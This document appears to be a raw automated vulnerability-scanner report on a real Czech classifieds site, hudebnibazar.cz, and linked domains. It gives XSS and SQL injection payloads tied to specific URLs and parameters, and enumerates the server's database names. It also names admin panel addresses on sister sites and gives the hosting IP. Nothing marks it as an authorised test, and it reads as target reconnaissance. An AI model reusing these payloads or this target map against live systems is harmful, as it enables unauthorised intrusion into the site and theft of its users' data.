- * XSS - Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- - method GET
- http://hudebnibazar.cz/index.php/"ns="alert(0x0005D6)
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /"ns="alert(0x0005D6)
- - method POST
- http://hudebnibazar.cz/formular.php?err=as&NactiZeSess=1
- Parameter Name: kategorie
- Parameter Type: Post
- Attack Pattern: "></script><script>alert(9)</script>
- -
- http://hudebnibazar.cz/smazat.php
- Parameter Name: page
- Parameter Type: Post
- Attack Pattern: 1'"--></style></script><script>alert(0x000974)</script>
- -
- http://hudebnibazar.cz/smazat.php
- Parameter Name: region
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00097F)</script>
- -
- http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Parameter Name: replyto
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0009AD)</script>
- -
- http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=\0\'\"--></style></script><script>netsparker(0x0009C5)</script>
- Parameter Name: sess
- Parameter Type: Post
- Attack Pattern: page=1&kategorie=0&nabpop=vse®ion=&ins=25&order='"--></style></script><script>alert(0x0009C5)</script>
- -
- http://hudebnibazar.cz/formular.php?ID=\'\"--></style></script><script>netsparker(0x000A63)</script>&err=he&NactiZeSess=1
- Parameter Name: ID
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000A63)</script>
- -
- http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Parameter Name: textodpovedi
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000A04)</script>
- -------------------------------------------------------------------------
- * [Possible] Permanent Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Vulnerable URL: http://hudebnibazar.cz/formular.php?err=as&NactiZeSess=1
- Injection URL: http://hudebnibazar.cz/formular.php?err=as&NactiZeSess=1
- Parameter Name: heslo2
- Parameter Type: Post
- Attack Pattern: 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'
- Vulnerable URL: http://hudebnibazar.cz/inzerat.php?err=as&typ=nahlasit&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Injection URL: http://hudebnibazar.cz/inzerat.php?err=as&typ=nahlasit&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Parameter Name: p_spam
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- -------------------------------------------------------------------------
- * COOKIE SQL INJECTION
- ReferURL http://hudebnibazar.cz/index.php^fulltext=___640085
- Parameter fulltext=___640085
- Type String
- KWordActionURL Electro
- -
- ReferURL http://hudebnibazar.cz/index.php?order=&kategorie=0&page=1^ins=25
- Parameter ins=25
- Type Integer
- KWordActionURL Electro
- -------------------------------------------------------------------------
- * URL SQL INJECTION
- http://hudebnibazar.cz/index.php?page=1&nabpop=vse®ion=&ins=25&order=&kategorie=310000
- http://hudebnibazar.cz/index.php?page=1&nabpop=vse®ion=&ins=25&order=&kategorie=99999999
- http://hudebnibazar.cz/smazat.php?page=1&kategorie=310000&nabpop=vse®ion=&ins=25&order=&ID=640085
- http://hudebnibazar.cz/smazat.php?page=1&kategorie=310000&nabpop=vse®ion=&ins=25&order=&ID=99999999
- http://hudebnibazar.cz/formular.php?page=1&kategorie=310000&nabpop=vse®ion=&ins=25&order=&ID=640085
- http://hudebnibazar.cz/formular.php?page=1&kategorie=310000&nabpop=vse®ion=&ins=25&order=&ID=99999999
- http://hudebnibazar.cz/inzerat.php?page=1&kategorie=310000&nabpop=vse®ion=&ins=25&order=&ID=640085
- http://hudebnibazar.cz/inzerat.php?page=1&kategorie=310000&nabpop=vse®ion=&ins=25&order=&ID=99999999
- http://hudebnibazar.cz/inzerat.php?order=&ID=640085&page=1&kategorie=310000&nabpop=vse®ion=&ins=25
- http://hudebnibazar.cz/zaslatheslo.php?back=smazat&ID=640085
- http://hudebnibazar.cz/zaslatheslo.php?back=smazat&ID=99999999
- -------------------------------------------------------------------------
- * Database User Has Admin Privileges
- Vulnerability Classifications: OWASP A6 CWE-16
- http://hudebnibazar.cz/formular.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: kategorie
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- -------------------------------------------------------------------------
- * Boolean Based SQL Injection
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- http://hudebnibazar.cz/smazat.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: kategorie
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/formular.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: kategorie
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/index.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: kategorie
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/index.php?page=1&ins=25&order=3&kategorie=-1 OR 17-7=10
- Parameter Name: kategorie
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/formular.php?ID=-1 OR 17-7=10&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: ID
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/smazat.php?ID=-1 OR 17-7=10&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: ID
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/inzerat.php?typ=nahlasit&ID=-1 OR 17-7=10&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: ID
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/inzerat.php?ID=-1 OR 17-7=10
- Parameter Name: ID
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/smazat.php
- Parameter Name: kategorie
- Parameter Type: Post
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/zaslatheslo.php?ID=-1 OR 17-7=10&back=formular
- Parameter Name: ID
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- -------------------------------------------------------------------------
- * Password Transmitted Over HTTP
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- http://hudebnibazar.cz/formular.php?ID=641587&err=he&NactiZeSess=1
- Form target action: vloz2db.php
- -------------------------------------------------------------------------
- * Cookie Not Marked As HttpOnly
- Vulnerability Classifications: OWASP A6 CWE-16
- http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Identified Cookie: lastvisittemp
- .
- http://hudebnibazar.cz/index.php?page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Identified Cookie: cook_ins
- .
- http://hudebnibazar.cz/formular.php?page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Identified Cookie: lastvisittemp
- .
- http://hudebnibazar.cz/inzerat.php?ID=641587&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Identified Cookie: lastvisittemp
- .
- http://hudebnibazar.cz/zaslatheslo.php?ID=641587&back=smazat
- Identified Cookie: lastvisittemp
- .
- http://hudebnibazar.cz/odpoved.php
- Identified Cookie: PHPSESSID
- Parameter Name: asp
- Parameter Type: Post
- Attack Pattern: data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwOEU1KTwvc2NyaXB0Pg==
- .
- http://hudebnibazar.cz/vloz2db.php
- Identified Cookie: PHPSESSID
- Parameter Name: kategorie
- Parameter Type: Post
- Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- .
- +++++++++++++++++++++++++++++++++++++++++++++++
- Servers and their databases
- Web Server: Apache
- DB Server: MySQL
- Current DB: hudebnibazar_cz
- Data Bases: information_schema
- FuzzyOcr
- adminis_kytary_cz
- forum_kytary_cz
- hudebnibazar_bak
- hudebnibazar_cz
- hudebnimagazin_cz
- iphone_inzerce
- iphonebazar_cz
- mail
- mysql
- openx_kytary_cz
- reklama_kytary_cz
- search_engine_position
- http://hudebniforum.cz - http://hudebniforum.cz/hudebnibazar-cz
- http://hudebnimagazin.cz
- http://kytary.cz - http://eshop.kytary.cz
- ---------------------------------------
- http://iphonebazar.cz
- XSS
- Vulnerable URL : http://iphonebazar.cz/?q=node/'" ns=netsparker(0x000CEF) &page='" ns=alert(0x000CEF)
- ---------------------------------------
- http://forum.kytary.cz
- http://openx.kytary.cz/www/admin/index.php / Welcome to OpenX
- http://reklama.kytary.cz/admin/index.php / Vítejte v Openads
- http://kacenka.kytary.cz - shared IP
- http://kacenka2.kytary.cz - Not Found, Apache only - 87.236.194.214
- ---------------------------------------
- whois
- IP address: 87.236.194.214
- CZ
- Czech Republic
- COOLHOUSING s.r.o.
- Organization: Coolhousing
- Host of this IP: smtp2.mail.kytary.cz